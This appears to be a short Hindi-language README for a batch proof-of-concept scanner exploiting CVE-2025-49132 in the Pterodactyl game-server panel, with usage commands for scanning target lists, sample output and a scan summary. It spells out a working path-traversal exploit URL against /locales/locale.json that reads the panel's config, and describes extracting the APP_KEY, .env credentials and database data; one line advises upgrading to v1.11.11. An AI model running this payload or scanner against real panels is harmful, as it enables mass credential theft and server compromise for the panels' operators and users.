
Pterodactyl पैनल CVE-2025-49132 बैच जाँच ☝️🤓
python3 CVE-2025-49132_poc.py -u http://pterodactyl.example.com
python3 CVE-2025-49132_poc.py -f 目标列表.txt
python3 CVE-2025-49132_poc.py -f 目标列表.txt -o 扫描结果.txt
जब भेद्यता मौजूद हो:
[+] भेद्यता मौजूद है: भेद्यता की पुष्टि हुई
भेद्यता विवरण:
• भेद्यता प्रकार: पथ ट्रावर्सल
• आक्रमण वेक्टर: पथ ट्रावर्सल पैरामीटर के माध्यम से /locales/locale.json तक पहुंच
• शोषण URL: http://target.com/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
संभावित प्रभाव:
• पैनल कॉन्फ़िगरेशन फ़ाइल (.env) से क्रेडेंशियल पढ़ना
• डेटाबेस से संवेदनशील जानकारी निकालना
• पैनल द्वारा प्रबंधित गेम सर्वर फ़ाइलों तक पहुंच
निकाला गया APP_KEY: base64{{your_secret_key_here}}
सुधार सुझाव: तुरंत Pterodactyl v1.11.11 या बाद के संस्करण में अपग्रेड करें
जब भेद्यता मौजूद नहीं है:
[-] कोई भेद्यता नहीं: कोई भेद्यता नहीं (स्थिति कोड: 404)
स्कैन सारांश:
स्कैन सारांश:
• कुल स्कैन लक्ष्य: 5
• भेद्यता वाले लक्ष्य: 2
• सुरक्षित लक्ष्य: 3
[!] गंभीर: भेद्यता वाले सिस्टम का पता चला! तत्काल कार्रवाई आवश्यक है।